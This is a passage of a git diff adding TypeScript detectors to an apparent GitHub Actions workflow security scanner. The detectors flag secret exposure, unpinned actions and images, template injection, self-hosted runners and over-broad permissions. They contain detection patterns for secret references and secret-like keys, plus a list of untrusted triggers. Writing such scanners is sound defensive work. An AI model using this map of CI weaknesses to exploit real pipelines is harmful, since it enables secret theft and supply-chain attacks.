unknown; + textContent: string; +} + +const DIRECT_SECRET_REFERENCE = /\bsecrets\.(?!GITHUB_TOKEN\b)[A-Za-z0-9_]+\b/iu; +const BRACKET_SECRET_REFERENCE = /\bsecrets\s*\[\s*['"][^'"\r\n]+['"]\s*\]/iu; + +function asRecord(value: unknown): Record | null { + if (!value || typeof value !== "object" || Array.isArray(value)) { + return null; + } + return value as Record; +} + +function appendPath(base: string, segment: string | number): string { + if (typeof segment === "number") { + return `${base}[${segment}]`; + } + return base.length > 0 ? `${base}.${segment}` : segment; +} + +function findSecretReference(value: unknown, path: string): { path: string; value: string } | null { + if (typeof value === "string") { + return DIRECT_SECRET_REFERENCE.test(value) || BRACKET_SECRET_REFERENCE.test(value) + ? 
{ path, value } + : null; + } + + if (Array.isArray(value)) { + for (let index = 0; index < value.length; index += 1) { + const found = findSecretReference(value[index], appendPath(path, index)); + if (found) { + return found; + } + } + return null; + } + + const record = asRecord(value); + if (!record) { + return null; + } + + for (const [key, child] of Object.entries(record)) { + const found = findSecretReference(child, appendPath(path, key)); + if (found) { + return found; + } + } + + return null; +} + +function hasDedicatedEnvironment(job: Record): boolean { + const environment = job.environment; + if (typeof environment === "string") { + return environment.trim().length > 0; + } + + return environment !== undefined && environment !== null; +} + +export function detectWorkflowSecretsOutsideEnv(input: WorkflowSecretsOutsideEnvInput): Finding[] { + if (!isGitHubWorkflowPath(input.filePath)) { + return []; + } + + const facts = extractWorkflowFacts(input.parsed); + const root = asRecord(input.parsed); + const jobsRecord = asRecord(root?.jobs); + if (!facts || !jobsRecord) { + return []; + } + + const findings: Finding[] = []; + + for (const job of facts.jobs) { + const jobRecord = asRecord(jobsRecord[job.id]); + if (!jobRecord || hasDedicatedEnvironment(jobRecord)) { + continue; + } + + const found = findSecretReference(jobRecord, `jobs.${job.id}`); + if (!found) { + continue; + } + + const evidence = buildFindingEvidence({ + textContent: input.textContent, + searchTerms: [found.value, "secrets."], + fallbackValue: found.value, + }); + + findings.push({ + rule_id: "workflow-secrets-outside-env", + finding_id: `WORKFLOW_SECRETS_OUTSIDE_ENV-${input.filePath}-${job.id}`, + severity: "HIGH", + category: "CI_PERMISSIONS", + layer: "L2", + file_path: input.filePath, + location: { field: found.path }, + description: "Job references workflow secrets without a dedicated environment", + affected_tools: ["github-actions"], + cve: null, + owasp: ["ASI02"], + cwe: "CWE-522", + 
confidence: "HIGH", + fixable: false, + remediation_actions: [ + "Use a dedicated environment for secrets-bound jobs or reduce the scope of secret exposure", + ], + evidence: evidence?.evidence ?? null, + suppressed: false, + }); + } + + return findings; +} diff --git a/src/layer2-static/detectors/workflow-self-hosted-runner.ts b/src/layer2-static/detectors/workflow-self-hosted-runner.ts new file mode 100644 index 0000000..6a3b3e9 --- /dev/null +++ b/src/layer2-static/detectors/workflow-self-hosted-runner.ts @@ -0,0 +1,86 @@ +import { buildFindingEvidence } from "../evidence.js"; +import type { Finding } from "../../types/finding.js"; +import { extractWorkflowFacts, isGitHubWorkflowPath } from "../workflow/parser.js"; + +export interface WorkflowSelfHostedRunnerInput { + filePath: string; + parsed: unknown; + textContent: string; +} + +function asRecord(value: unknown): Record | null { + if (!value || typeof value !== "object" || Array.isArray(value)) { + return null; + } + return value as Record; +} + +function normalizeRunsOn(value: unknown): string[] { + if (typeof value === "string") { + return [value.trim()]; + } + + if (!Array.isArray(value)) { + return []; + } + + return value + .filter((entry): entry is string => typeof entry === "string") + .map((entry) => entry.trim()); +} + +function isSelfHostedRunner(value: unknown): boolean { + return normalizeRunsOn(value).some((entry) => entry.toLowerCase() === "self-hosted"); +} + +export function detectWorkflowSelfHostedRunner(input: WorkflowSelfHostedRunnerInput): Finding[] { + if (!isGitHubWorkflowPath(input.filePath)) { + return []; + } + + const facts = extractWorkflowFacts(input.parsed); + const root = asRecord(input.parsed); + const jobsRecord = asRecord(root?.jobs); + if (!facts || !jobsRecord) { + return []; + } + + const findings: Finding[] = []; + + for (const job of facts.jobs) { + const jobRecord = jobsRecord[job.id]; + if (!isSelfHostedRunner(asRecord(jobRecord)?.["runs-on"])) { + continue; + } + + 
const evidence = buildFindingEvidence({ + textContent: input.textContent, + searchTerms: ["self-hosted"], + fallbackValue: "runs-on: self-hosted", + }); + + findings.push({ + rule_id: "workflow-self-hosted-runner", + finding_id: `WORKFLOW_SELF_HOSTED_RUNNER-${input.filePath}-${job.id}`, + severity: "MEDIUM", + category: "CI_PERMISSIONS", + layer: "L2", + file_path: input.filePath, + location: { field: `jobs.${job.id}.runs-on` }, + description: "Job uses a self-hosted runner", + affected_tools: ["github-actions"], + cve: null, + owasp: ["ASI02"], + cwe: "CWE-732", + confidence: "MEDIUM", + fixable: false, + remediation_actions: [ + "Prefer GitHub-hosted runners unless the workflow requires a hardened self-hosted trust boundary", + ], + evidence: evidence?.evidence ?? null, + suppressed: false, + }); + } + + return findings; +} diff --git a/src/layer2-static/detectors/workflow-stale-action-refs.ts b/src/layer2-static/detectors/workflow-stale-action-refs.ts new file mode 100644 index 0000000..8ab465b --- /dev/null +++ b/src/layer2-static/detectors/workflow-stale-action-refs.ts @@ -0,0 +1,230 @@ +import { buildFindingEvidence } from "../evidence.js"; +import type { Finding } from "../../types/finding.js"; +import { extractWorkflowFacts, isGitHubWorkflowPath } from "../workflow/parser.js"; + +export interface WorkflowStaleActionRefsInput { + filePath: string; + parsed: unknown; + textContent: string; +} + +interface RepositoryUseTarget { + raw: string; + owner: string; + repo: string; + ref: string; +} + +type FetchFn = typeof fetch; + +const staleActionCacheByFetch = new WeakMap>(); +const GITHUB_API_HEADERS = { + Accept: "application/vnd.github+json", + "User-Agent": "CodeGate", +} as const; +const MAX_TAG_PAGES = 10; + +function asRecord(value: unknown): Record | null { + if (!value || typeof value !== "object" || Array.isArray(value)) { + return null; + } + return value as Record; +} + +function isExternalRepositoryUse(value: string): boolean { + return 
value.startsWith("./") || value.startsWith("../") || value.startsWith("docker://"); +} + +function trimTrailingSlashes(value: string): string { + return value.replace(/\/+$/u, ""); +} + +function parseRepositoryUses(value: string): RepositoryUseTarget | null { + const trimmed = value.trim(); + if (trimmed.length === 0 || isExternalRepositoryUse(trimmed)) { + return null; + } + + const atIndex = trimmed.lastIndexOf("@"); + if (atIndex < 0) { + return null; + } + + const slug = trimTrailingSlashes(trimmed.slice(0, atIndex).trim()); + const ref = trimmed.slice(atIndex + 1).trim(); + const [owner, repo] = slug.split("/"); + if (!owner || !repo || ref.length === 0) { + return null; + } + + return { + raw: trimmed, + owner: owner.toLowerCase(), + repo: repo.toLowerCase(), + ref, + }; +} + +function isCommitSha(ref: string): boolean { + return /^[a-f0-9]{40}$/iu.test(ref.trim()); +} + +async function commitPointsToTag(owner: string, repo: string, ref: string): Promise { + const fetchFn = globalThis.fetch; + if (typeof fetchFn !== "function") { + return false; + } + + let cache = staleActionCacheByFetch.get(fetchFn); + if (!cache) { + cache = new Map(); + staleActionCacheByFetch.set(fetchFn, cache); + } + + const normalizedRef = ref.toLowerCase(); + const cacheKey = `${owner}/${repo}@${normalizedRef}`; + const cached = cache.get(cacheKey); + if (cached !== undefined) { + return cached; + } + + try { + for (let page = 1; page <= MAX_TAG_PAGES; page += 1) { + const url = new URL( + `https://api.github.com/repos/${encodeURIComponent(owner)}/${encodeURIComponent(repo)}/tags`, + ); + url.searchParams.set("per_page", "100"); + url.searchParams.set("page", String(page)); + + const response = await fetchFn(url, { + headers: GITHUB_API_HEADERS, + }); + + if (!response.ok) { + cache.set(cacheKey, false); + return false; + } + + const payload = (await response.json()) as unknown; + if (!Array.isArray(payload)) { + cache.set(cacheKey, false); + return false; + } + + for (const tag of 
payload) { + const tagRecord = asRecord(tag); + const commitRecord = asRecord(tagRecord?.commit); + const tagSha = typeof commitRecord?.sha === "string" ? commitRecord.sha : undefined; + if (tagSha && tagSha.toLowerCase() === normalizedRef) { + cache.set(cacheKey, true); + return true; + } + } + + const linkHeader = response.headers.get("link") ?? ""; + if (!linkHeader.includes('rel="next"') || payload.length < 100) { + break; + } + } + } catch { + return false; + } + + cache.set(cacheKey, false); + return false; +} + +function gatherUsesTargets(parsed: unknown): Array { + const root = asRecord(parsed); + const jobsRecord = asRecord(root?.jobs); + if (!jobsRecord) { + return []; + } + + const targets: Array = []; + const addTarget = (uses: string, field: string): void => { + const parsedUses = parseRepositoryUses(uses); + if (parsedUses) { + targets.push({ + ...parsedUses, + field, + }); + } + }; + + for (const [jobId, jobValue] of Object.entries(jobsRecord)) { + const jobRecord = asRecord(jobValue); + if (!jobRecord) { + continue; + } + + if (typeof jobRecord.uses === "string") { + addTarget(jobRecord.uses, `jobs.${jobId}.uses`); + } + + const steps = Array.isArray(jobRecord.steps) ? 
jobRecord.steps : []; + steps.forEach((step, stepIndex) => { + const stepRecord = asRecord(step); + if (stepRecord && typeof stepRecord.uses === "string") { + addTarget(stepRecord.uses, `jobs.${jobId}.steps[${stepIndex}].uses`); + } + }); + } + + return targets; +} + +export async function detectWorkflowStaleActionRefs( + input: WorkflowStaleActionRefsInput, +): Promise { + if (!isGitHubWorkflowPath(input.filePath)) { + return []; + } + + if (!extractWorkflowFacts(input.parsed)) { + return []; + } + + const targets = gatherUsesTargets(input.parsed); + const findings: Finding[] = []; + + for (const target of targets) { + if (!isCommitSha(target.ref)) { + continue; + } + + if (await commitPointsToTag(target.owner, target.repo, target.ref)) { + continue; + } + + const evidence = buildFindingEvidence({ + textContent: input.textContent, + searchTerms: [target.raw, target.ref], + fallbackValue: target.raw, + }); + + findings.push({ + rule_id: "workflow-stale-action-refs", + finding_id: `WORKFLOW_STALE_ACTION_REFS-${input.filePath}-${target.field}`, + severity: "LOW", + category: "CI_VULNERABLE_ACTION", + layer: "L2", + file_path: input.filePath, + location: { field: target.field }, + description: "Workflow action reference pins a commit hash that does not resolve to a tag", + affected_tools: ["github-actions"], + cve: null, + owasp: ["ASI02"], + cwe: "CWE-829", + confidence: "HIGH", + fixable: false, + remediation_actions: [ + "Pin the action to a commit hash that corresponds to a release tag, or document why the raw commit is required", + ], + evidence: evidence?.evidence ?? 
null, + suppressed: false, + }); + } + + return findings; +} diff --git a/src/layer2-static/detectors/workflow-superfluous-actions.ts b/src/layer2-static/detectors/workflow-superfluous-actions.ts new file mode 100644 index 0000000..965528b --- /dev/null +++ b/src/layer2-static/detectors/workflow-superfluous-actions.ts @@ -0,0 +1,93 @@ +import { buildFindingEvidence } from "../evidence.js"; +import type { Finding } from "../../types/finding.js"; +import { extractWorkflowFacts, isGitHubWorkflowPath } from "../workflow/parser.js"; + +export interface WorkflowSuperfluousActionsInput { + filePath: string; + parsed: unknown; + textContent: string; +} + +function normalizeUses(value: string): string { + return value.trim().toLowerCase(); +} + +function isExternalUses(value: string): boolean { + const normalized = value.trim(); + return ( + normalized.length > 0 && + !normalized.startsWith("./") && + !normalized.startsWith("../") && + !normalized.startsWith("docker://") + ); +} + +export function detectWorkflowSuperfluousActions( + input: WorkflowSuperfluousActionsInput, +): Finding[] { + if (!isGitHubWorkflowPath(input.filePath)) { + return []; + } + + const facts = extractWorkflowFacts(input.parsed); + if (!facts) { + return []; + } + + const findings: Finding[] = []; + + facts.jobs.forEach((job, jobIndex) => { + const usesCounts = new Map(); + + job.steps.forEach((step, stepIndex) => { + const uses = step.uses?.trim(); + if (!uses || !isExternalUses(uses)) { + return; + } + + const key = normalizeUses(uses); + const current = usesCounts.get(key); + if (!current) { + usesCounts.set(key, { count: 1, firstStep: stepIndex, rawUses: uses }); + return; + } + current.count += 1; + }); + + for (const [key, value] of usesCounts.entries()) { + if (value.count < 2) { + continue; + } + + const evidence = buildFindingEvidence({ + textContent: input.textContent, + searchTerms: [value.rawUses], + fallbackValue: `${value.rawUses} repeated ${value.count} times`, + }); + + 
findings.push({ + rule_id: "workflow-superfluous-actions", + finding_id: `WORKFLOW_SUPERFLUOUS_ACTIONS-${input.filePath}-${jobIndex}-${key}`, + severity: "LOW", + category: "CI_SUPPLY_CHAIN", + layer: "L2", + file_path: input.filePath, + location: { field: `jobs.${job.id}.steps[${value.firstStep}].uses` }, + description: "Workflow repeats the same external action in a single job", + affected_tools: ["github-actions"], + cve: null, + owasp: ["ASI02"], + cwe: "CWE-1059", + confidence: "MEDIUM", + fixable: false, + remediation_actions: [ + "Remove duplicate external action invocations unless repetition is explicitly required", + ], + evidence: evidence?.evidence ?? null, + suppressed: false, + }); + } + }); + + return findings; +} diff --git a/src/layer2-static/detectors/workflow-template-injection.ts b/src/layer2-static/detectors/workflow-template-injection.ts new file mode 100644 index 0000000..2e049ec --- /dev/null +++ b/src/layer2-static/detectors/workflow-template-injection.ts @@ -0,0 +1,114 @@ +import sinkMap from "../workflow/injection-sinks.json" with { type: "json" }; +import type { Finding } from "../../types/finding.js"; +import { extractWorkflowFacts, isGitHubWorkflowPath } from "../workflow/parser.js"; + +export interface WorkflowTemplateInjectionInput { + filePath: string; + parsed: unknown; +} + +const UNTRUSTED_TRIGGERS = new Set([ + "pull_request", + "pull_request_target", + "issue_comment", + "discussion_comment", + "workflow_run", +]); + +function hasTemplateExpression(value: string | undefined): boolean { + return typeof value === "string" && value.includes("${{"); +} + +function normalizeUsesSlug(value: string): string { + const beforeRef = value.split("@")[0] ?? 
value; + return beforeRef.replace(/\/+$/u, "").toLowerCase(); +} + +export function detectWorkflowTemplateInjection(input: WorkflowTemplateInjectionInput): Finding[] { + if (!isGitHubWorkflowPath(input.filePath)) { + return []; + } + + const facts = extractWorkflowFacts(input.parsed); + if (!facts) { + return []; + } + + const hasUntrustedTrigger = facts.triggers.some((trigger) => UNTRUSTED_TRIGGERS.has(trigger)); + if (!hasUntrustedTrigger) { + return []; + } + + const findings: Finding[] = []; + + facts.jobs.forEach((job, jobIndex) => { + job.steps.forEach((step, stepIndex) => { + if (hasTemplateExpression(step.run)) { + findings.push({ + rule_id: "workflow-template-injection", + finding_id: `WORKFLOW_TEMPLATE_INJECTION-RUN-${input.filePath}-${jobIndex}-${stepIndex}`, + severity: "HIGH", + category: "CI_TEMPLATE_INJECTION", + layer: "L2", + file_path: input.filePath, + location: { field: `jobs.${job.id}.steps[${stepIndex}].run` }, + description: + "Template expression in run step may allow untrusted input to reach shell execution", + affected_tools: ["github-actions"], + cve: null, + owasp: ["ASI02"], + cwe: "CWE-94", + confidence: "HIGH", + fixable: false, + remediation_actions: [ + "Move untrusted template expressions into validated environment variables before execution", + ], + evidence: step.run ?? 
null, + suppressed: false, + }); + } + + const uses = step.uses?.trim(); + if (!uses || !step.with) { + return; + } + const slug = normalizeUsesSlug(uses); + const sinkFields = (sinkMap as Record)[slug]; + if (!sinkFields || sinkFields.length === 0) { + return; + } + + for (const sinkField of sinkFields) { + const sinkValue = step.with[sinkField]; + if (!hasTemplateExpression(sinkValue)) { + continue; + } + + findings.push({ + rule_id: "workflow-template-injection", + finding_id: `WORKFLOW_TEMPLATE_INJECTION-SINK-${input.filePath}-${jobIndex}-${stepIndex}-${sinkField}`, + severity: "HIGH", + category: "CI_TEMPLATE_INJECTION", + layer: "L2", + file_path: input.filePath, + location: { field: `jobs.${job.id}.steps[${stepIndex}].with.${sinkField}` }, + description: + "Template expression reaches an action input known to execute code or evaluate scripts", + affected_tools: ["github-actions"], + cve: null, + owasp: ["ASI02"], + cwe: "CWE-94", + confidence: "HIGH", + fixable: false, + remediation_actions: [ + "Avoid passing untrusted template expressions into code execution sink inputs", + ], + evidence: sinkValue, + suppressed: false, + }); + } + }); + }); + + return findings; +} diff --git a/src/layer2-static/detectors/workflow-undocumented-permissions.ts b/src/layer2-static/detectors/workflow-undocumented-permissions.ts new file mode 100644 index 0000000..b04223d --- /dev/null +++ b/src/layer2-static/detectors/workflow-undocumented-permissions.ts @@ -0,0 +1,161 @@ +import { buildFindingEvidence } from "../evidence.js"; +import type { Finding } from "../../types/finding.js"; +import { extractWorkflowFacts, isGitHubWorkflowPath } from "../workflow/parser.js"; + +export interface WorkflowUndocumentedPermissionsInput { + filePath: string; + parsed: unknown; + textContent: string; +} + +function isWritePermission(value: unknown): boolean { + if (typeof value === "string") { + return value === "write" || value === "write-all"; + } + return false; +} + +function 
lineContaining(textContent: string, term: string): string | null { + const lines = textContent.split(/\r?\n/u); + for (const line of lines) { + if (line.includes(term)) { + return line; + } + } + return null; +} + +function hasLineComment(textContent: string, term: string): boolean { + const line = lineContaining(textContent, term); + return line ? line.includes("#") : false; +} + +function pushPermissionFinding( + findings: Finding[], + input: WorkflowUndocumentedPermissionsInput, + field: string, + evidenceTerm: string, + description: string, + permissionValue: string, +): void { + const evidence = buildFindingEvidence({ + textContent: input.textContent, + searchTerms: [evidenceTerm, permissionValue], + fallbackValue: evidenceTerm, + }); + + findings.push({ + rule_id: "workflow-undocumented-permissions", + finding_id: `WORKFLOW_UNDOCUMENTED_PERMISSIONS-${input.filePath}-${field}`, + severity: "HIGH", + category: "CI_PERMISSIONS", + layer: "L2", + file_path: input.filePath, + location: { field }, + description, + affected_tools: ["github-actions"], + cve: null, + owasp: ["ASI02"], + cwe: "CWE-732", + confidence: "MEDIUM", + fixable: false, + remediation_actions: [ + "Document why elevated permissions are required or reduce the permission scope", + ], + evidence: evidence?.evidence ?? 
null, + suppressed: false, + }); +} + +export function detectWorkflowUndocumentedPermissions( + input: WorkflowUndocumentedPermissionsInput, +): Finding[] { + if (!isGitHubWorkflowPath(input.filePath)) { + return []; + } + + const facts = extractWorkflowFacts(input.parsed); + if (!facts) { + return []; + } + + const findings: Finding[] = []; + + if (typeof facts.workflowPermissions === "string") { + const value = facts.workflowPermissions.trim().toLowerCase(); + if ( + (value === "write-all" || value === "write") && + !hasLineComment(input.textContent, "permissions:") + ) { + pushPermissionFinding( + findings, + input, + "permissions", + `permissions: ${facts.workflowPermissions}`, + "Workflow defines elevated permissions without documenting why they are needed", + `permissions: ${facts.workflowPermissions}`, + ); + } + } else if (facts.workflowPermissions && typeof facts.workflowPermissions === "object") { + for (const [scope, value] of Object.entries(facts.workflowPermissions)) { + if (!isWritePermission(value)) { + continue; + } + const term = `${scope}: ${value}`; + if (hasLineComment(input.textContent, term)) { + continue; + } + pushPermissionFinding( + findings, + input, + `permissions.${scope}`, + term, + "Workflow defines elevated permissions without documenting why they are needed", + term, + ); + } + } + + facts.jobs.forEach((job) => { + if (typeof job.permissions === "string") { + const value = job.permissions.trim().toLowerCase(); + if (value === "write-all" && !hasLineComment(input.textContent, "permissions:")) { + pushPermissionFinding( + findings, + input, + `jobs.${job.id}.permissions`, + `permissions: ${job.permissions}`, + "Job defines elevated permissions without documenting why they are needed", + `permissions: ${job.permissions}`, + ); + } + return; + } + + if (!job.permissions || typeof job.permissions !== "object") { + return; + } + + for (const [scope, value] of Object.entries(job.permissions)) { + if (!isWritePermission(value)) { + 
continue; + } + + const term = `${scope}: ${value}`; + if (hasLineComment(input.textContent, term)) { + continue; + } + + pushPermissionFinding( + findings, + input, + `jobs.${job.id}.permissions.${scope}`, + term, + "Job defines elevated permissions without documenting why they are needed", + term, + ); + } + }); + + return findings; +} diff --git a/src/layer2-static/detectors/workflow-unpinned-images.ts b/src/layer2-static/detectors/workflow-unpinned-images.ts new file mode 100644 index 0000000..1060db5 --- /dev/null +++ b/src/layer2-static/detectors/workflow-unpinned-images.ts @@ -0,0 +1,141 @@ +import { buildFindingEvidence } from "../evidence.js"; +import type { Finding } from "../../types/finding.js"; +import { extractWorkflowFacts, isGitHubWorkflowPath } from "../workflow/parser.js"; + +export interface WorkflowUnpinnedImagesInput { + filePath: string; + parsed: unknown; + textContent: string; +} + +interface ImageTarget { + field: string; + image: string; +} + +const SHA256_DIGEST_RE = /@sha256:[a-f0-9]{64}$/iu; +const MUTABLE_LATEST_TAG = "latest"; + +function asRecord(value: unknown): Record | null { + if (!value || typeof value !== "object" || Array.isArray(value)) { + return null; + } + return value as Record; +} + +function getImageTag(image: string): string | null { + const trimmed = image.trim(); + if (trimmed.length === 0 || trimmed.includes("@")) { + return null; + } + + const lastSlash = trimmed.lastIndexOf("/"); + const lastColon = trimmed.lastIndexOf(":"); + if (lastColon <= lastSlash) { + return null; + } + + const tag = trimmed.slice(lastColon + 1).trim(); + return tag.length > 0 ? 
tag : null; +} + +function isShaPinned(image: string): boolean { + return SHA256_DIGEST_RE.test(image.trim()); +} + +function gatherImageTargets(parsed: unknown): ImageTarget[] { + const root = asRecord(parsed); + const jobsRecord = asRecord(root?.jobs); + if (!jobsRecord) { + return []; + } + + const targets: ImageTarget[] = []; + + for (const [jobId, jobValue] of Object.entries(jobsRecord)) { + const jobRecord = asRecord(jobValue); + if (!jobRecord) { + continue; + } + + const containerRecord = asRecord(jobRecord.container); + if (typeof containerRecord?.image === "string") { + targets.push({ + field: `jobs.${jobId}.container.image`, + image: containerRecord.image, + }); + } + + const servicesRecord = asRecord(jobRecord.services); + if (servicesRecord) { + for (const [serviceName, serviceValue] of Object.entries(servicesRecord)) { + const serviceRecord = asRecord(serviceValue); + if (typeof serviceRecord?.image === "string") { + targets.push({ + field: `jobs.${jobId}.services.${serviceName}.image`, + image: serviceRecord.image, + }); + } + } + } + } + + return targets; +} + +export function detectWorkflowUnpinnedImages(input: WorkflowUnpinnedImagesInput): Finding[] { + if (!isGitHubWorkflowPath(input.filePath)) { + return []; + } + + if (!extractWorkflowFacts(input.parsed)) { + return []; + } + + const findings: Finding[] = []; + + for (const target of gatherImageTargets(input.parsed)) { + const trimmedImage = target.image.trim(); + if (trimmedImage.length === 0 || isShaPinned(trimmedImage)) { + continue; + } + + const tag = getImageTag(trimmedImage); + if (tag !== null && tag !== MUTABLE_LATEST_TAG) { + continue; + } + + const evidence = buildFindingEvidence({ + textContent: input.textContent, + searchTerms: [trimmedImage, "image:"], + fallbackValue: trimmedImage, + }); + + findings.push({ + rule_id: "workflow-unpinned-images", + finding_id: `WORKFLOW_UNPINNED_IMAGES-${input.filePath}-${target.field}`, + severity: "HIGH", + category: "CI_SUPPLY_CHAIN", + layer: 
"L2", + file_path: input.filePath, + location: { field: target.field }, + description: + tag === MUTABLE_LATEST_TAG + ? "Workflow container image uses the mutable latest tag" + : "Workflow container image is not pinned to a SHA256 digest", + affected_tools: ["github-actions"], + cve: null, + owasp: ["ASI02"], + cwe: "CWE-829", + confidence: "HIGH", + fixable: false, + remediation_actions: [ + "Pin container images to immutable sha256 digests instead of mutable tags", + ], + evidence: evidence?.evidence ?? null, + suppressed: false, + }); + } + + return findings; +} diff --git a/src/layer2-static/detectors/workflow-unpinned-uses.ts b/src/layer2-static/detectors/workflow-unpinned-uses.ts new file mode 100644 index 0000000..19f7b61 --- /dev/null +++ b/src/layer2-static/detectors/workflow-unpinned-uses.ts @@ -0,0 +1,77 @@ +import { buildFindingEvidence } from "../evidence.js"; +import type { Finding } from "../../types/finding.js"; +import { extractWorkflowFacts, isGitHubWorkflowPath } from "../workflow/parser.js"; + +export interface WorkflowUnpinnedUsesInput { + filePath: string; + parsed: unknown; + textContent: string; +} + +function isPinnedToCommit(ref: string): boolean { + return /^[a-f0-9]{40}$/iu.test(ref.trim()); +} + +function isRepositoryUses(value: string): boolean { + return /^[a-z0-9._-]+\/[a-z0-9._-]+(?:\/[^@]+)?@[^\s]+$/iu.test(value.trim()); +} + +export function detectWorkflowUnpinnedUses(input: WorkflowUnpinnedUsesInput): Finding[] { + if (!isGitHubWorkflowPath(input.filePath)) { + return []; + } + + const facts = extractWorkflowFacts(input.parsed); + if (!facts) { + return []; + } + + const findings: Finding[] = []; + + facts.jobs.forEach((job, jobIndex) => { + job.steps.forEach((step, stepIndex) => { + const uses = step.uses?.trim(); + if (!uses || uses.startsWith("./") || uses.startsWith("docker://")) { + return; + } + if (!isRepositoryUses(uses)) { + return; + } + + const ref = uses.split("@").slice(1).join("@").trim(); + if (ref.length === 0 || 
isPinnedToCommit(ref)) { + return; + } + + const evidence = buildFindingEvidence({ + textContent: input.textContent, + searchTerms: [uses], + fallbackValue: `uses: ${uses}`, + }); + + findings.push({ + rule_id: "workflow-unpinned-uses", + finding_id: `WORKFLOW_UNPINNED_USES-${input.filePath}-${jobIndex}-${stepIndex}`, + severity: "HIGH", + category: "CI_SUPPLY_CHAIN", + layer: "L2", + file_path: input.filePath, + location: { field: `jobs.${job.id}.steps[${stepIndex}].uses` }, + description: "Workflow action reference is not pinned to an immutable commit hash", + affected_tools: ["github-actions"], + cve: null, + owasp: ["ASI02"], + cwe: "CWE-829", + confidence: "HIGH", + fixable: false, + remediation_actions: [ + "Pin external actions to a full commit SHA and track tag intent in comments", + ], + evidence: evidence?.evidence ?? null, + suppressed: false, + }); + }); + }); + + return findings; +} diff --git a/src/layer2-static/detectors/workflow-unredacted-secrets.ts b/src/layer2-static/detectors/workflow-unredacted-secrets.ts new file mode 100644 index 0000000..3c14769 --- /dev/null +++ b/src/layer2-static/detectors/workflow-unredacted-secrets.ts @@ -0,0 +1,124 @@ +import { buildFindingEvidence } from "../evidence.js"; +import type { Finding } from "../../types/finding.js"; +import { extractWorkflowFacts, isGitHubWorkflowPath } from "../workflow/parser.js"; + +export interface WorkflowUnredactedSecretsInput { + filePath: string; + parsed: unknown; + textContent: string; +} + +interface SecretCandidate { + field: string; + key: string; + value: string; +} + +const SECRET_KEY_PATTERN = /(token|password|secret|api[_-]?key|private[_-]?key|access[_-]?key)/iu; +const REDACTED_VALUE_PATTERN = /^\s*\$\{\{\s*secrets\.[^}]+\}\}\s*$/iu; + +function asRecord(value: unknown): Record | null { + if (!value || typeof value !== "object" || Array.isArray(value)) { + return null; + } + return value as Record; +} + +function collectEnvSecrets( + envValue: unknown, + baseField: string, 
+ candidates: SecretCandidate[], +): void { + const env = asRecord(envValue); + if (!env) { + return; + } + + for (const [key, value] of Object.entries(env)) { + if (!SECRET_KEY_PATTERN.test(key) || typeof value !== "string") { + continue; + } + const trimmed = value.trim(); + if (trimmed.length < 8 || REDACTED_VALUE_PATTERN.test(trimmed)) { + continue; + } + candidates.push({ + field: `${baseField}.${key}`, + key, + value: trimmed, + }); + } +} + +function gatherSecretCandidates(parsed: unknown): SecretCandidate[] { + const root = asRecord(parsed); + const candidates: SecretCandidate[] = []; + + collectEnvSecrets(root?.env, "env", candidates); + + const jobs = asRecord(root?.jobs); + if (!jobs) { + return candidates; + } + + for (const [jobId, jobValue] of Object.entries(jobs)) { + const job = asRecord(jobValue); + if (!job) { + continue; + } + + collectEnvSecrets(job.env, `jobs.${jobId}.env`, candidates); + + const steps = Array.isArray(job.steps) ? job.steps : []; + steps.forEach((stepValue, stepIndex) => { + const step = asRecord(stepValue); + if (!step) { + return; + } + collectEnvSecrets(step.env, `jobs.${jobId}.steps[${stepIndex}].env`, candidates); + }); + } + + return candidates; +} + +export function detectWorkflowUnredactedSecrets(input: WorkflowUnredactedSecretsInput): Finding[] { + if (!isGitHubWorkflowPath(input.filePath)) { + return []; + } + + const facts = extractWorkflowFacts(input.parsed); + if (!facts) { + return []; + } + + return gatherSecretCandidates(input.parsed).map((candidate) => { + const evidence = buildFindingEvidence({ + textContent: input.textContent, + searchTerms: [candidate.key, candidate.value], + fallbackValue: `${candidate.key} set to plaintext value`, + }); + + return { + rule_id: "unredacted-secrets", + finding_id: `UNREDACTED_SECRETS-${input.filePath}-${candidate.field}`, + severity: "HIGH", + category: "CI_PERMISSIONS", + layer: "L2" as const, + file_path: input.filePath, + location: { field: candidate.field }, + 
description: "Workflow exposes a plaintext secret-like value in environment configuration", + affected_tools: ["github-actions"], + cve: null, + owasp: ["ASI02"], + cwe: "CWE-798", + confidence: "HIGH" as const, + fixable: false, + remediation_actions: [ + "Move secret material to GitHub encrypted secrets and reference it via ${{ secrets.* }}", + ], + evidence: evidence?.evidence ?? null, + suppressed: false, + }; + }); +} diff --git a/src/layer2-static/detectors/workflow-unsound-condition.ts b/src/layer2-static/detectors/workflow-unsound-condition.ts new file mode 100644 index 0000000..490e6b4 --- /dev/null +++ b/src/layer2-static/detectors/workflow-unsound-condition.ts @@ -0,0 +1,123 @@ +import { buildFindingEvidence } from "../evidence.js"; +import type { Finding } from "../../types/finding.js"; +import { extractWorkflowFacts, isGitHubWorkflowPath } from "../workflow/parser.js"; + +export interface WorkflowUnsoundConditionInput { + filePath: string; + parsed: unknown; + textContent: string; +} + +interface StepCondition { + jobId: string; + stepIndex: number; + condition: string; + run?: string; + uses?: string; +} + +const SENSITIVE_COMMANDS = ["publish", "deploy", "release", "push"]; + +function asRecord(value: unknown): Record | null { + if (!value || typeof value !== "object" || Array.isArray(value)) { + return null; + } + return value as Record; +} + +function gatherStepConditions(parsed: unknown): StepCondition[] { + const root = asRecord(parsed); + const jobs = asRecord(root?.jobs); + if (!jobs) { + return []; + } + + const candidates: StepCondition[] = []; + for (const [jobId, jobValue] of Object.entries(jobs)) { + const job = asRecord(jobValue); + const steps = Array.isArray(job?.steps) ? job.steps : []; + steps.forEach((stepValue, stepIndex) => { + const step = asRecord(stepValue); + const condition = typeof step?.if === "string" ? 
step.if : undefined; + if (!condition) { + return; + } + candidates.push({ + jobId, + stepIndex, + condition, + run: typeof step?.run === "string" ? step.run : undefined, + uses: typeof step?.uses === "string" ? step.uses : undefined, + }); + }); + } + + return candidates; +} + +function isAlwaysCondition(condition: string): boolean { + const normalized = condition.toLowerCase(); + return normalized.includes("always()"); +} + +function isSensitiveExecution(run: string | undefined, uses: string | undefined): boolean { + const runValue = run?.toLowerCase() ?? ""; + if (SENSITIVE_COMMANDS.some((token) => runValue.includes(token))) { + return true; + } + + return typeof uses === "string" && uses.trim().length > 0; +} + +export function detectWorkflowUnsoundCondition(input: WorkflowUnsoundConditionInput): Finding[] { + if (!isGitHubWorkflowPath(input.filePath)) { + return []; + } + + const facts = extractWorkflowFacts(input.parsed); + if (!facts) { + return []; + } + + const findings: Finding[] = []; + + for (const candidate of gatherStepConditions(input.parsed)) { + if ( + 